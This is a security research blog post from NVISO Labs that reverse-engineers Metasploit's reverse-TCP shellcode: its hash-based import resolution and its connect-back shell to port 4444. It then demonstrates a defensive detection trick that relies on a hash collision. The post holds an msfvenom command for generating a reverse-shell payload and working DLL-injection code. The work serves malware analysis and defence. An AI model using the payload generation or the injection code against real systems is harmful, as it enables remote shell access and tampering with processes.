RSS Security

🔒
❌ About FreshRSS
There are new articles available, click to refresh the page.
Before yesterdayNVISO Labs

Anatomy and Disruption of Metasploit Shellcode

2 September 2021 at 16:04

In April 2021 we went through the anatomy of a Cobalt Strike stager and how some of its signature evasion techniques ended up being ineffective against detection technologies. In this blog post we will go one level deeper and focus on Metasploit, an often-used framework interoperable with Cobalt Strike.

Throughout this blog post we will cover the following topics:

  1. The shellcode’s import resolution – How Metasploit shellcode locates functions from other DLLs and how we can precompute these values to resolve any imports from other payload variants.
  2. The reverse-shell’s execution flow – How trivial a reverse shell actually is.
  3. Disruption of the Metasploit import resolution – A non-intrusive deception technique (no hooks involved) to have Metasploit notify the antivirus (AV) of its presence with high confidence.

For this analysis, we generated our own shellcode using Metasploit under version v6.0.30-dev. The malicious sample generated using the command below had as resulting SHA256 hash of 3792f355d1266459ed7c5615dac62c3a5aa63cf9e2c3c0f4ba036e6728763903 and is available on VirusTotal for readers willing to have a try themselves.

msfvenom -p windows/shell_reverse_tcp -a x86 > shellcode.vir

Throughout the analysis we have renamed functions, variables and offsets to reflect their role and improve clarity.

Initial Analysis

In this section we will outline the initial logic followed to determine the next steps of the analysis (import resolution and execution flow analysis).

While a typical executable contains one or more entry-points (exported functions, TLS-callbacks, …), shellcode can be seen as the most primitive code format where initial execution occurs from the first byte.

Analyzing the generated shellcode from the initial bytes outlines two operations:

  1. The first instruction at ① can be ignored from an analytical perspective. The cld operation clears the direction flag, ensuring string data is read on-wards instead of back-wards (e.g.: cmd vs dmc).
  2. The second call operation at ② transfers execution to a function we named Main, this function will contain the main logic of the shellcode.
Figure 1: Disassembled shellcode calling the Main function.

Within the Main function, we observe additional calls such as the four ones highlighted in the trimmed figure below (③, ④, ⑤ and ⑥). These calls target a yet unidentified function whose address is stored in the ebp register. To understand where this function is located, we will need to take a step back and understand how a call instruction operates.

Figure 2: Disassembly of the Main function.

A call instruction transfers execution to the target destination by performing two operations:

  1. It pushes the return address (the memory address of the instruction located after the call instruction) on the stack. This address can later be used by the ret instruction to return execution from the called function (callee) back to the calling function (caller).
  2. It transfers execution to the target destination (callee), as a jmp instruction would.

As such, the first pop instruction from the Main function at ③ stores the caller’s return address into the ebp register. This return address is then called as a function later on, among others at offset 0x99, 0xA9 and 0xB8 (④, ⑤ and ⑥). This pattern, alongside the presence of a similarly looking push before each call tends to suggest the return address stored within ebp is the dynamic import resolution function.

Without diving into unnecessary depth, a “normal” executable (e.g.: Portable Executable on Windows) contains the necessary information so that, once loaded by the Operating System (OS) loader, the code can call imported routines such as those from the Windows API (e.g.: LoadLibraryA). To achieve this default behavior, the executable is expected to have a certain structure which the OS can interpret. As shellcode is a bare-bone version of the code (it has none of the expected structures), the OS loader can’t assist it in resolving these imported functions; even more so, the OS loader will fail to “execute” a shellcode file. To cope with this problem, shellcode commonly performs a “dynamic import resolution”.

One of the most common techniques to perform “dynamic import resolution” is by hashing each available exported function and compare it with the required import’s hash. As shellcode authors can’t always predict whether a specific DLL (e.g.: ws3_32.dll for Windows Sockets) and its exports are already loaded, it is not uncommon to observe shellcode loading DLLs by calling the LoadLibraryA function first (or one of its alternatives). Relying on LoadLibraryA (or alternatives) before calling other DLLs’ exports is a stable approach as these library-loading functions are part of kernel32.dll, one of the few DLLs which can be expected to be loaded into each process.

To confirm our above theory, we can search for all call instructions as can be seen in the following figure (e.g.: using IDA’s Text... option under the Search menu). Apart from the first call to the Main function, all instances refer to the ebp register. This observation, alongside well-known constants we will observe in the next section, supports our theory that the address stored in ebp holds a pointer to the function performing the dynamic import resolution.

Figure 3: All call instructions in the shellcode.

The abundance of calls towards the ebp register suggests it indeed holds a pointer to the import resolution function, which we now know is located right after the first call to Main.

Import Resolution Analysis

So far we noticed the instructions following the initial call to Main play a crucial role as what we expect to be the import resolution routine. Before we analyze the shellcode’s logic, let us analyze this resolution routine as it will ease the understanding of the remaining calls.

From Import Hash to Function

The code located immediately after the initial call to Main is where the import resolution starts. To resolve these imports, the routine first locates the list of modules loaded into memory as these contain their available exported functions.

To find these modules, an often leveraged shellcode technique is to interact with the Process Environment Block (shortened as PEB).

In computing the Process Environment Block (abbreviated PEB) is a data structure in the Windows NT operating system family. It is an opaque data structure that is used by the operating system internally, most of whose fields are not intended for use by anything other than the operating system. […] The PEB contains data structures that apply across a whole process, including global context, startup parameters, data structures for the program image loader, the program image base address, and synchronization objects used to provide mutual exclusion for process-wide data structures.

wikipedia.org

As can be observed in figure 4, to access the PEB, the shellcode accesses the Thread Environment Block (TEB) which is immediately accessible through a register (⑦). The TEB structure itself contains a pointer to the PEB (⑦). From the PEB, the shellcode can locate the PEB_LDR_DATA structure (⑧) which in turn contains a reference to multiple double-linked module lists. As can be observed at (⑨), the Metasploit shellcode leverages one of these double-linked lists (InMemoryOrderModuleList) to later iterate through the LDR_DATA_TABLE_ENTRY structures containing the loaded module information.

Once the first module is identified, the shellcode retrieves the module’s name (BaseDllName.Buffer) at ⑩ and the buffer’s maximum length ( BaseDllName.MaximumLength) at ⑪ which is required as the buffer is not guaranteed to be NULL-terminated.

Figure 4: Disassembly of the initial module retrieval.

One point worth highlighting is that, as opposed to usual pointers (TEB.ProcessEnvironmentBlock, PEB.Ldr, …), a double-linked list points to the next item’s list entry. This means that instead of pointing to the structures’ start, a pointer from the list will target a non-zero offset. As such, while in the following figure the LDR_DATA_TABLE_ENTRY has the BaseDllName property at offset 0x2C, the offset from the list entry’s perspective will be 0x24 (0x2C-0x08). This can be observed in the above figure 4 where an offset of 8 has to be subtracted to access both of the BaseDllName properties at ⑩ and ⑪.

Figure 5: From TEB to BaseDllName.

With the DLL name’s buffer and maximum length recovered, the shellcode proceeds to generate a hash. To do so, the shellcode performs a set of operations for each ASCII character within the maximum name length:

  1. If the character is lowercase, it gets modified into an uppercase. This operation is performed according to the character’s ASCII representation meaning that if the value is 0x61 or higher (a or higher), 0x20 gets subtracted to fall within the uppercase range.
  2. The generated hash (initially 0) is rotated right (ROR) by 13 bits (0x0D).
  3. The upper-cased character is added to the existing hash.
Figure 6: Schema depicting the hashing loops of KERNEL32.DLL‘s first character (K).

With the repeated combination of rotations and additions on a fixed registry size (32 bits in edi‘s case), characters will ultimately start overlapping. These repeated and overlapping combinations make the operations non-reversible and hence produces a 32-bit hash/checksum for a given name.

One interesting observation is that while the BaseDllName in LDR_DATA_TABLE_ENTRY is Unicode-encoded (2 bytes per character), the code treats it as ASCII encoding (1 byte per character) by using lodsb (see ⑫).

Figure 7: Disassembly of the module’s name hashing routine.

The hash generation algorithm can be implemented in Python as shown in the snippet below. While we previously mentioned that the BaseDllName‘s buffer was not required to be NULL-terminated per Microsoft documentation, extensive testing has showed that NULL-termination was always the case and could generally be assumed. This assumption is what makes the MaximumLength property a valid boundary, similarly to the Length property. The following snippet hence expects the data passed to get_hash to be a Python bytes object generated from a NULL-terminated Unicode string.

# Helper function for rotate-right on 32-bit architectures
def ror(number, bits):
    return ((number >> bits) | (number << (32 - bits))) & 0xffffffff

# Define hashing algorithm
def get_hash(data):
    # Initialize hash to 0
    result = 0
    # Loop each character
    for b in data:
        # Make character uppercase if needed
        if b < ord('a'):
            b -= 0x20
        # Rotate DllHash right by 0x0D bits
        result = ror(result, 0x0D)
        # Add character to DllHash
        result = (result + b) & 0xffffffff
    return result

The above functions could be used as follows to compute the hash of KERNEL32.DLL.

# Define a NULL-terminated base DLL name
name = 'KERNEL32.DLL\0'
# Encode it as Unicode
encoded = name.encode('UTF-16-LE')
# Compute the hash
value = hex(get_hash(encoded))
# And print it ('0x92af16da')
print(value)

With the DLL name’s hash generated, the shellcode proceeds to identify all exported functions. To do so, the shellcode starts by retrieving the LDR_DATA_TABLE_ENTRY‘s DllBase property (⑬) which points to the DLL’s in-memory address. From there, the IMAGE_EXPORT_DIRECTORY structure is identified by walking the Portable Executable’s structures (⑭ and ⑮) and adding the relative offsets to the DLL’s in-memory base address. This last structure contains the number of exported function names (⑰) as well as a table of pointers towards these (⑯).

Figure 8: Disassembly of the export retrieval.

The above operations can be schematized as follow, where dotted lines represent addresses computed from relative offsets increased by the DLL’s in-memory base address.

Figure 9: From LDR_DATA_TABLE_ENTRY to IMAGE_EXPORT_DIRECTORY.

Once the number of exported names and their pointers are identified, the shellcode enumerates the table in descending order. Specifically, the number of names is used as a decremented counter at ⑱. For each exported function’s name and while none matches, the shellcode performs a hashing routine (hash_export_name at ⑲) similar to the one we observed previously, with as sole difference that character cases are preserved (hash_export_character).

The final hash is obtained by adding the recently computed function hash (ExportHash) to the previously obtained module hash (DllHash) at ⑳. This addition is then compared at ㉑ to the sought hash and, unless they match, the operation starts again for the next function.

Figure 10: Disassembly of export’s name hashing.

If none of the exported functions match, the routine retrieves the next module in the InMemoryOrderLinks double-linked list and performs the above operations again until a match is found.

Figure 11: Disassembly of the loop to the next module.

The above walked double-linked list can be schematized as the following figure.

Figure 12: Walking the InMemoryOrderModuleList.

If a match is found, the shellcode will proceed to call the exported function. To retrieve its address from the previously identified IMAGE_EXPORT_DIRECTORY, the code will first need to map the function’s name to its ordinal (㉒), a sequential export number. Once the ordinal is recovered from the AddressOfNameOrdinals table, the address can be obtained by using the ordinal as an index in the AddressOfFunctions table (㉓).

Figure 13: Disassembly of the import “call”.

Finally, once the export’s address is recovered, the shellcode simulates the call behavior by ensuring the return address is first on the stack (removing the hash it was searching for, at ㉔) , followed by all parameters as required by the default Win32 API __stdcall calling convention (㉕). The code then performs a jmp operation at ㉖ to transfer execution to the dynamically resolved import which, upon return, will resume from where the initial call ebp operation occurred.

Overall, the dynamic import resolution can be schematized as a nested loop. The main loop walks modules following the in-memory order (blue in the figure below) while, for each module, a second loop walks exported functions looking for a matching hash between desired import and available exports (red in the figure below).

Figure 14: The import resolution flow.

Building a Rainbow Table

Identifying which imports the shellcode relies on will provide us with further insight into the rest of its logic. Instead of dynamically analyzing the shellcode, and given that we have figured out the hashing algorithm above, we can build ourselves a rainbow table.

A rainbow table is a precomputed table for caching the output of cryptographic hash functions, usually for cracking password hashes.

wikipedia.org

The following Python snippet computes the “Metasploit” hashes for DLL exports located in the most common system locations.

import glob
import os
import pefile
import sys

size = 32
mask = ((2**size) - 1)

# Resolve 32- and 64-bit System32 paths
root = os.environ.get('SystemRoot')
if not root:
    raise Exception('Missing "SystemRoot" environment variable')

globs = [f"{root}\\System32\\*.dll", f"{root}\\SysWOW64\\*.dll"]

# Helper function for rotate-right
def ror(number, bits):
    return ((number >> (bits % size)) | (number << (size - (bits % size)))) &  mask

# Define hashing algorithm
def get_hash(data):
    result = 0
    for b in data:
        result = ror(result, 0x0D)
        result = (result + b) & mask
    return result

# Helper function to uppercase data
def upper(data):
    return [(b if b < ord('a') else b - 0x20) for b in data]

# Print CSV header
print("File,Function,IDA,Yara")

# Loop through all DLLs
for g in globs:
    for file in glob.glob(g):
        # Compute the DllHash
        name = upper(os.path.basename(file).encode('UTF-16-LE') + b'\x00\x00')
        file_hash = get_hash(name)
        try:
            # Parse the DLL for exports
            pe = pefile.PE(file, fast_load=True)
            pe.parse_data_directories(directories = [pefile.DIRECTORY_ENTRY["IMAGE_DIRECTORY_ENTRY_EXPORT"]])
            if hasattr(pe, "DIRECTORY_ENTRY_EXPORT"):
                # Loop through exports
                for exp in pe.DIRECTORY_ENTRY_EXPORT.symbols:
                    if exp.name:
                        # Compute ExportHash
                        name = exp.name.decode('UTF-8')
                        exp_hash = get_hash(exp.name + b'\x00')
                        metasploit_hash = (file_hash + exp_hash) & 0xffffffff
                        # Compute additional representations
                        ida_view = metasploit_hash.to_bytes(size/8, byteorder='big').hex().upper() + "h"
                        yara_view = metasploit_hash.to_bytes(size/8, byteorder='little').hex(' ')
                        # Print CSV entry
                        print(f"\"{file}\",\"{name}\",\"{ida_view}\",\"{{{yara_view}}}\"")
        except pefile.PEFormatError:
            print(f"Unable to parse {file} as a valid PE, skipping.", file=sys.stderr)
            continue

As an example, the following PowerShell commands generate a rainbow table, then searches it for the 726774Ch hash we observed first in figure 2. For everyone’s convenience, we have published our rainbow.csv version containing 239k hashes.

# Generate the rainbow table in CSV format
PS > .\rainbow.py | Out-File .\rainbow.csv -Encoding UTF8

# Search the rainbow table for a hash
PS > Get-Content .\rainbow.csv | Select-String 726774Ch
"C:\Windows\System32\kernel32.dll","LoadLibraryA","0726774Ch","{4c 77 26 07}"
"C:\Windows\SysWOW64\kernel32.dll","LoadLibraryA","0726774Ch","{4c 77 26 07}"

As can be observed above, the first import resolved and called by the shellcode is LoadLibraryA, exported by the 32- and 64-bit kernel32.dll.

Execution Flow Analysis

With the import resolving sorted-out, understanding the remaining code becomes a lot more accessible. As we can see in figure 15, the shellcode starts by performing the following calls:

  1. LoadLibraryA at ㉗ to ensure the ws3_32 library is loaded. If not yet loaded, this will map the ws3_32.dll DLL in memory, enabling the shellcode to further resolve additional functions related to the Windows Socket 2 technology.
  2. WSAStartup at ㉘ to initiate the usage of sockets within the shellcode’s process.
  3. WSASocketA at ㉙ to create a new socket. This one will be a stream-based (SOCK_STREAM) socket over IPv4 (AF_INET).
Figure 15: Disassembly of the socket initialization.

Once the socket is created, the shellcode proceeds to call the connect function at ㉝ with the sockaddr_in structure previously pushed on the stack (㉜). The sockaddr_in structure contains valuable information from an incident response perspective such as the protocol (0x0200 being AF_INET, a.k.a. IPv4, in little endianness), the port (0x115c being the default 4444 Metasploit port in big endianness) as well as the C2 IPv4 address at ㉛ (0xc0a801ca being 192.168.1.202 in big endianness).

If the connection fails, the shellcode retries up to 5 times (decrementing at ㉞ the counter defined at ㉚) after which it will abort execution using ExitProcess (㉟).

Figure 16: Disassembly of the socket connection.

If the connection succeeds, the shellcode will create a new cmd process and connect all of its Standard Error, Output and Input (㊱) to the established C2 socket. The process itself is started through a CreateProcessA call at ㊲.

Figure 17: Execution of the reverse-shell.

Finally, while the process is running, the shellcode performs the following operations:

  1. Wait indefinitely at ㊳ for the remote shell to terminate by calling WaitForSingleObject.
  2. Once terminated, identify the Windows operating system version at ㊴ using GetVersion and exit at ㊵ using either ExitProcess or RtlExitUserThread.
Figure 18: Termination of the shellcode.

Overall, the execution flow of Metasploit’s windows/shell_reverse_tcp shellcode can be schematized as follows:

Figure 19: Metasploit’s TCP reverse-shell execution flow.

Shellcode Disruption

With the execution flow analysis squared away, let’s see how we can turn the tables on the shellcode and disrupt it. From an attacker’s perspective, the shellcode itself is considered trusted while the environment it runs in is hostile. This section will build upon the assumption that we don’t know where shellcode is executing in memory and, as such, hooking/modifying the shellcode itself is not an acceptable solution.

In this section we will firstly focus on the theoretical aspects before covering a proof-of-concept implementation.

The Weaknesses

CWE-1288: Improper Validation of Consistency within Input

The product receives a complex input with multiple elements or fields that must be consistent with each other, but it does not validate or incorrectly validates that the input is actually consistent.

cwe.mitre.org

From the shellcode’s perspective only two external interactions provide a possible attack surface. The first and most obvious surface is the C2 channel where some security solutions can detect/impair either the communications protocol or the surrounding API calls. This attack surface however has the massive caveat that security solutions have to make the distinction between legitimate and malicious behaviors, possibly resulting in some medium/low-confidence detection.

A second less obvious attack surface is the import resolution itself which, from the shellcode’s perspective, relies on external process data. Within this import resolution routine, we observed how the shellcode relied on the BaseDllName property to generate a hash for each module.

Figure 20: The hashing routine retrieving both Buffer and MaximumLength to hash a module’s BaseDllName.

While the module’s exports were UTF-8 NULL-terminated strings, the BaseDllName property was a UNICODE_STRING structure. This structure contains multiple properties:

typedef struct _UNICODE_STRING {
  USHORT Length;
  USHORT MaximumLength;
  PWSTR  Buffer;
} UNICODE_STRING, *PUNICODE_STRING;

Length: The length, in bytes, of the string stored in Buffer.

MaximumLength: The length, in bytes, of Buffer.

Buffer: Pointer to a buffer used to contain a string of wide characters.

[…]

If the string is null-terminated, Length does not include the trailing null character.

The MaximumLength is used to indicate the length of Buffer so that if the string is passed to a conversion routine such as RtlAnsiStringToUnicodeString the returned string does not exceed the buffer size.

docs.microsoft.com

While not explicitly mentioned in the above documentation, we can implicitly understand that the buffer’s MaximumLength property is unrelated to the actual string’s Length property. The Unicode string does not need to consume the entire Buffer, neither is it guaranteed to be NULL-terminated. Theoretically, the Windows API should only consider the first Length bytes of the Buffer for comparison, ignoring any bytes between the Length and MaximumLength positions. Increasing a UNICODE_STRING‘s buffer (Buffer and MaximumLength) should not impact functions relying on the stored string.

As the shellcode’s hashing routine relies on the buffer’s MaximumLength, similar strings within differently-sized buffers will generate different hashes. This flaw in the hashing routine can be leveraged to neutralize potential Metasploit shellcode. From a technical perspective, as security solutions already hook process creation and inject themselves, interfering with the hashing routine without knowledge of its existence or location can be achieved by increasing the BaseDllName buffer for modules required by Metasploit (e.g.: kernel32.dll).

This hash-input validation flaw is what we will leverage next as initial vector to cause a Denial of Service as well as an Execution Flow Hijack.

CWE-823: Use of Out-of-range Pointer Offset

The program performs pointer arithmetic on a valid pointer, but it uses an offset that can point outside of the intended range of valid memory locations for the resulting pointer.

cwe.mitre.org

One observation we made earlier is how the shellcode loops modules indefinitely until a matching export is found. As we found a flaw to alter hashes, let us analyze what happens if all hashes fail to match.

While walking the double-linked list could loop indefinitely, the shellcode will actually generate an “Access Violation” error once all modules have been checked. This exception is not generated explicitly by the shellcode but rather occurs as the code doesn’t verify the list’s boundaries. Given that for each item in the list the BaseDllName.Buffer pointer is loaded from offset 0x28, an exception will occur once we access the first non-LDR_DATA_TABLE_ENTRY item in the list. As shown in the figure below, this will be the case once the shellcode loops back to the first PEB_LDR_DATA structure, at which stage an out-of-bounds read will occur resulting in an invalid pointer being de-referenced.

Figure 21: An out-of-bounds read when walking the InMemoryOrderModuleList double-linked list.

Although from a defensive perspective causing a Denial of Service is better than having Metasploit shellcode execute, let’s see how one could further exploit the above flaw to the defender’s advantage.

Abusing CWE-1288 to Hijack the Execution Flow

One module of interest is kernel32.dll which, as previously analyzed in the “Execution Flow Analysis” section, is the first required module in order to call the LoadLibraryA function. During the hashing routine, the kernel32.dll hash is computed to be 0x92af16da. By applying the above buffer-resize technique, we can ensure the shellcode loops additional modules since the original hashes won’t match. From here, a security solution has a couple of options:

  • Our injected security solution’s DLL could be named kernel32.dll. While its hashes would match, having two modules named kernel32.dll might have unintended consequences on legitimate calls to LoadLibraryA.
  • Similarly, as we are already modifying buffers in LDR_DATA_TABLE_ENTRY structures, we could easily save the original values of the kernel32.dll buffer and assign them to our security solution’s injected module. While this would theoretically work, having a second buffer in memory called kernel32.dll isn’t a great idea as previously mentioned.
  • Alternatively, our security solution’s injected module could have a different name, as long as there is a hash-collision with the original hash. This technique won’t impact legitimate calls such as LoadLibraryA as these rely on value-based comparisons, as opposed to the shellcode’s hash-based comparisons.

We previously observed how the Metasploit shellcode performed hashing using additions and rotations on ASCII characters (1-byte). As a follow-up on figure 6, the following schema depicts the state of KERNEL32.DLL‘s hash on the third loop, where the ASCII characters K and E overlap. As one might observe, the NULL character is a direct consequence of performing 1-byte operations on what initially is a Unicode string (2-byte).

Figure 22: The first and third ASCII characters overlapping.

To obtain a hash collision, we need to identify changes which we can perform on the initial KERNEL32.DLL string without altering the resulting hash. The following figure highlights how there is a 6-bit relationship between the first and third ASCII character. By subtracting the second bit of the first character, we can increment the eighth bit (2+6) of the third character without affecting the resulting hash.

Figure 23: A hash collision between the first and third ASCII characters.

While the above collision is not practical (the ASCII or Unicode character 0xC5 is not within the alphanumeric range), we can apply the same principle to identify acceptable relationships. The following Python snippet brute-forces the relationships among Unicode characters for the KERNEL32.DLL string assuming we don’t alter the string’s length.

name = "KERNEL32.DLL\0"
for i in range(len(name)):
    for j in range(len(name)):
        # Avoid duplicates
        if j <= i:
            continue
        # Compute right-shift/left-shift relationships
        # We shift twice by 13 bits due to Unicode being twice the size of ASCII.
        # We perform a modulo of 32 due to the registers being, in our case,  32 bits in size.
        relation = ((13*2*(j-i))%32)
        if relation > 16:
            relation -= 32
        # Get close relationships (0, 1, 2 or 3 bit-shifts)
        if -3 <= relation <= 3:
            print(f"Characters at index {i} and {j:2d} have a relationship of {relation} bits")
# "Characters at index 0 and  5 have a relationship of 2 bits"
# "Characters at index 0 and 11 have a relationship of -2 bits"
# "Characters at index 1 and  6 have a relationship of 2 bits"
# "Characters at index 1 and 12 have a relationship of -2 bits"
# "Characters at index 2 and  7 have a relationship of 2 bits"
# "Characters at index 3 and  8 have a relationship of 2 bits"
# "Characters at index 4 and  9 have a relationship of 2 bits"
# "Characters at index 5 and 10 have a relationship of 2 bits"
# "Characters at index 6 and 11 have a relationship of 2 bits"
# "Characters at index 7 and 12 have a relationship of 2 bits"

As observed above, multiple character pairs can be altered to cause a hash collision. As an example, there is a 2-bit left-shift relation between the characters at Unicode position 0 and 11.

Given a 2-bit left-shift is similar to a multiplication by 4, incrementing the Unicode character at position 0 by any value requires decrementing the character at position 11 by 4 times the same value to keep the Metasploit hash intact. The following Python commands highlight the different possible combinations between these two characters for KERNEL32.DLL.

# The original hash (0x92af16da)
print(hex(get_hash(upper('KERNEL32.DLL\0'.encode('UTF-16-LE')))))
# "0x92af16da"
# Decrementing 'K' by 3 requires adding 12 to 'L'
print(hex(get_hash(upper('HERNEL32.DLX\0'.encode('UTF-16-LE')))))
# "0x92af16da"
# Decrementing 'K' by 2 requires adding 8 to 'L'
print(hex(get_hash(upper('IERNEL32.DLT\0'.encode('UTF-16-LE')))))
# "0x92af16da"
# Decrementing 'K' by 1 requires adding 4 to 'L'
print(hex(get_hash(upper('JERNEL32.DLP\0'.encode('UTF-16-LE')))))
# "0x92af16da"
# Incrementing 'K' by 1 requires substracting 4 from 'L'
print(hex(get_hash(upper('LERNEL32.DLH\0'.encode('UTF-16-LE')))))
# "0x92af16da"
# Incrementing 'K' by 2 requires substracting 8 from 'L'
print(hex(get_hash(upper('MERNEL32.DLD\0'.encode('UTF-16-LE')))))
# "0x92af16da"

This hash collision combined with the buffer-resize technique can be chained to ensure our custom DLL gets evaluated as KERNEL32.DLL in the hashing routine. From here, if we export a LoadLibraryA function, the Metasploit import resolution will incorrectly call our implementation resulting in an execution flow hijack. This hijack can be leveraged to signal the security solution about a high-confidence Metasploit import resolution taking place.

Building a Proof of Concept

To demonstrate our theory, let’s build a proof-of-concept DLL which will, once loaded, make use of CWE-1288 to simulate how an EDR (Endpoint Detection and Response) solution could detect Metasploit without prior knowledge of its in-memory location. As we want to exploit the above hash collisions, our DLL will be named hernel32.dlx.

The proof of concept has been published on NVISO’s GitHub repository.

The Process Injection

To simulate how a security solution would be injected into most processes, let’s build a simple function which will run our DLL into a process of our choosing.

The Inject function will trick the targeted process into loading a specific DLL (our hernel32.dlx) and execute its DllMain function from where we’ll trigger the buffer-resizing. While multiple techniques exist, we will simply write our DLL’s path into the target process and create a remote thread calling LoadLibraryA. This remote thread will then load our DLL as if the target process intended to do it.

METASPLOP_API
void
Inject(HWND hwnd, HINSTANCE hinst, LPSTR lpszCmdLine, int nCmdShow)
{
    #pragma EXPORT
    int PID;
    HMODULE hKernel32;
    FARPROC fLoadLibraryA;
    HANDLE hProcess;
    LPVOID lpInject;

    // Recover the current module path
    char payload[MAX_PATH];
    int size;
    if ((size = GetModuleFileNameA(hPayload, payload, MAX_PATH)) == NULL)
    {
        MessageBoxError("Unable to get module file name.");
        return;
    }
    
    // Recover LoadLibraryA 
    hKernel32 = GetModuleHandle(L"Kernel32");
    if (hKernel32 == NULL)
    {
        MessageBoxError("Unable to get a handle to Kernel32.");
        return;
    }
    fLoadLibraryA = GetProcAddress(hKernel32, "LoadLibraryA");
    if (fLoadLibraryA == NULL)
    {
        MessageBoxError("Unable to get LoadLibraryA address.");
        return;
    }

    // Open the processes
    PID = std::stoi(lpszCmdLine);
    hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, PID);
    if (!hProcess)
    {
        char message[200];
        if (sprintf_s(message, 200, "Unable to open process %d.", PID) > 0)
        {
            MessageBoxError(message);
        }
        return;
    }

    // Allocated memory for the injection
    lpInject = VirtualAllocEx(hProcess, NULL, size + 1, MEM_COMMIT, PAGE_READWRITE);
    if (lpInject)
    {
        wchar_t buffer[100];
        wsprintfW(buffer, L"You are about to execute the injected library in process %d.", PID);
        if (WriteProcessMemory(hProcess, lpInject, payload, size + 1, NULL) && IDCANCEL != MessageBox(NULL, buffer, L"NVISO Mock AV", MB_ICONINFORMATION | MB_OKCANCEL))
        {
            CreateRemoteThread(hProcess, NULL, NULL, (LPTHREAD_START_ROUTINE)fLoadLibraryA, lpInject, NULL, NULL);
        }
        else
        {
            VirtualFreeEx(hProcess, lpInject, NULL, MEM_RELEASE);
        }
    }
    else
    {
        char message[200];
        if (sprintf_s(message, 200, "Unable to allocate %d bytes.", size+1) > 0)
        {
            MessageBoxError(message);
        }
    }
    CloseHandle(hProcess);
    return;
}

As one might notice, the above code relies on the hPayload variable. This variable will be defined in the DllMain function as we aim to get the current DLL’s module regardless of its name, whereas GetModuleHandleA would require us to hard-code the hernel32.dlx name.

HMODULE hPayload;

BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
                     )
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        hPayload = hModule;
        break;
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

With our Inject method exported, we can now proceed to build the logic needed to trigger CWE-1288.

The Buffer-Resizing

Resizing the BaseDllName buffer from the kernel32.dll module can be accomplished using the logic below. Similar to the shellcode’s technique, we will recover the PEB, walk the InMemoryOrderModuleList and once the KERNEL32.DLL module is found, increase its buffer by 1.

void
Metasplop() {
    PPEB pPeb = NULL;
    PPEB_LDR_DATA pLdrData = NULL;
    PLIST_ENTRY pHeadEntry = NULL;
    PLIST_ENTRY pEntry = NULL;
    PLDR_DATA_TABLE_ENTRY pLdrEntry = NULL;
    USHORT MaximumLength = NULL;

    // Read the PEB from the current process
    if ((pPeb = GetCurrentPebProcess()) == NULL) {
        MessageBoxError("GetPebCurrentProcess failed.");
        return;
    }

    // Get the InMemoryOrderModuleList
    pLdrData = pPeb->Ldr;
    pHeadEntry = &pLdrData->InMemoryOrderModuleList;

    // Loop the modules
    for (pEntry = pHeadEntry->Flink; pEntry != pHeadEntry; pEntry = pEntry->Flink) {
        pLdrEntry = CONTAINING_RECORD(pEntry, LDR_DATA_TABLE_ENTRY, InMemoryOrderModuleList);
        // Skip modules which aren't kernel32.dll
        if (lstrcmpiW(pLdrEntry->BaseDllName.Buffer, L"KERNEL32.DLL")) continue;
        // Compute the new maximum length
        MaximumLength = pLdrEntry->BaseDllName.MaximumLength + 1;
        // Create a new increased buffer
        wchar_t* NewBuffer = new wchar_t[MaximumLength];
        wcscpy_s(NewBuffer, MaximumLength, pLdrEntry->BaseDllName.Buffer);
        // Update the BaseDllName
        pLdrEntry->BaseDllName.Buffer = NewBuffer;
        pLdrEntry->BaseDllName.MaximumLength = MaximumLength;
        break;
    }
    return;
}

This logic is best triggered as soon as possible once injection occurred. While this could be done through a TLS hook, we will for simplicity update the existing DllMain function to invoke Metasplop on DLL_PROCESS_ATTACH.

HMODULE hPayload;

BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
                     )
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        hPayload = hModule;
        Metasplop();
        break;
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

The Signal

As the shellcode we analyzed relied on LoadLibraryA, let’s build an implementation which will simply raise the Metasploit alert and then terminate the current malicious process. The following function will only be triggered by the shellcode and is itself never called from within our DLL.

_Ret_maybenull_
HMODULE
WINAPI
LoadLibraryA(_In_ LPCSTR lpLibFileName)
{
    #pragma EXPORT
    // Raise the error message
    char buffer[200];
    if (sprintf_s(buffer, 200, "The process %d has attempted to load \"%s\" through LoadLibraryA using Metasploit's dynamic import resolution.\n", GetCurrentProcessId(), lpLibFileName) > 0)
    {
        MessageBoxError(buffer);
    }
    // Exit the process
    ExitProcess(-1);
}

The above approach can be performed for other variations such as LoadLibraryW, LoadLibraryExA and others.

The Result

With our emulated security solution ready, we can proceed to demonstrate our technique. As such, we’ll start by executing Shellcode.exe, a simple shellcode loader (show on the left in figure 24). This shellcode loader mentions its process ID (which we’ll target for injection) and then waits for the shellcode path it needs to execute.

Once we know in which process the shellcode will run, we can inject our emulated security solution (shown on the right in figure 24). This process is typically performed by the security solution for each process and is merely done manually in our PoC for simplicity. Using our custom DLL, we can inject into the desired process using the following command where the path to hernel32.dlx and the process ID have been picked accordingly.

# rundll32.exe <dll_path>,Inject <target_pid>
rundll32.exe C:\path\to\hernel32.dlx,Inject 6780
Figure 24: Manually emulating the AV injection into the future malicious process.

Once the injection is performed, the Shellcode.exe process has been staged (module buffer resized, colliding DLL loaded) for exploitation of the CWE-1288 weakness should any Metasploit shellcode run. It is worth noting that at this stage, no shellcode has been loaded nor has there been any memory allocation for it. This ensures we comply with the assumption that we don’t know where shellcode is executing.

With our mock security solution injected, we can proceed to provide the path to our initially generated shellcode (shellcode.vir in our case) to the soon-to-be malicious Shellcode.exe process (left in figure 25).

Figure 25: Executing the malicious shellcode as would be done by the stagers.

Once the shellcode runs, we can see how in figure 26 our LoadLibraryA signalling function gets called, resulting in a high-confidence detection of shellcode-based import resolution.

Figure 26: The input-validation flaw and hash collision being chained to signal the AV.

Disclosure

As a matter of courtesy, NVISO delayed the publishing of this blog post to provide Rapid7, the maintainers of Metasploit, with sufficient review time.

Conclusion

This blog post highlighted the anatomy of Metasploit shellcode with an additional focus on the dynamic import resolution. Within this dynamic import resolution we further identified two weaknesses, one of which can be leveraged to identify runtime Metasploit shellcode with high confidence.

